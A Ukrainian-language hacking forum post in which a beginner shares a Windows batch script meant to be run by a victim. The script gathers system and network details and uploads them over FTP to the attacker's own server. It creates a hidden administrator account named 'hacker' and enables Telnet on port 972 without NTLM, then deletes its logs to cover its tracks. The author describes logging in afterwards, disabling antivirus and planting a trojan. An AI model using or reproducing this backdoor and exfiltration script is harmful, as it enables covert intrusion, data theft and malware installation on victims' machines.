Я повний новачок, так що прошу сильно не копати! Я знаю що про Telnet написано вище даху, але йя хотів би показати злегка доведений до розуму скрипт.

Тіло скрипта:
net user > c:windowsuser.log //Збирає інфу про Юзверях
ipconfig /all > c:windowsipconf.log //Збирає і запихає в файл інфу про IP
route print > c:windowsroute.log //Збирає і запихає в файл інфу про мережевих маршрутах
net share > c:windowsshare.log // Інфа про ресурси
ver > c:windowsver.log //Ну і найголовніше, версія і збірка вінди)))
chcp 1251 //Шматок коду далі я запозичив у статті «Злом через Telnet» чи якось так…
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Адміністратори hacker /add
net localgroup Користувачі SUPPORT_388945a0 /del
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
reg add «HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList» /v hacker /t REG_DWORD /d 00000000
ftp -s:TAR_BZ.TXT //Тут подрубаемся до FTP і скидаємо дані собі на комп (При цьому задіюється лівий фаил в катор содержется код для FTP)
del c:windowsuser.log //Тут зачищаємо сліди…
del c:windowsipconf.log
del c:windowsroute.log
del c:windowsshare.log
del c:windowsver.log
exit //Без коментарів

Ось тіло TAR_BZ.TXT (я незнаю чому його так назвав йя….):
open xxx.xxx.xxx.xxx //Залазимо на свій FTP (місце xxx.xxx.xxx.xxx ставимо IP (бажано свій:)))
login //Тут пишемо логін
pass //Тут пас
put c:windowsuser.log //Логи йдуть до нас… )))
put c:windowsipconf.log
put c:windowsroute.log
put c:windowsshare.log
put c:windowsver.log
bye //Отрубаемся від FTP

Працює це (якщо хто непонял) так, запустивши файл, жертва (підставляє сама себе)))) тупо скидає всі дані про інеті і відкриває Telnet на порте 972. Ми шукаємо тупо
IP жертви і ліземо на його комп під логіном «hacker», і пасом «hack». І все, ми на ящику жертви, і тут повна свобода дій. Можна відключивши, припустимо Касперыча, кинути троян і запустити віддалено.
На цьому все. І запам’ятайте, я не несу ніякої відповідальності за ваші дії на чужому компі, бо йя навів приклад…